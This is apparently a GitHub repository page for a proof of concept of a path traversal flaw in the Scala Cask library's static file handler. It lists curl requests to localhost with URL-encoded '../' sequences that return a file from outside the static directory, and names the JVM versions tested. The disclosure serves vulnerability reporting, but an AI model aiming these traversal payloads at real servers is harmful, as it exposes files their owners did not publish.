sbt run
curl http://localhost:8080/static/%2E%2E%2Fhi.txt
- Outputs
Got me…
fromhi.txt
instead ofHi!
fromstatic/hi.txt
curl http://localhost:8080/static/..%2F/hi.txt
works as well
- Outputs
- Tested on: HotSpot 17+35-LTS-2724, OpenJDK 11.0.25, OpenJDK 21.0.5
-
Notifications
You must be signed in to change notification settings - Fork 0
Maeeen/cask-static-path-traversal-issue
Folders and files
Name | Name | Last commit message | Last commit date | |
---|---|---|---|---|
Repository files navigation
About
This repository showcases a vulnerability in the Scala's Cask library where path traversal could be done
Resources
Stars
Watchers
Forks
Releases
No releases published
Packages 0
No packages published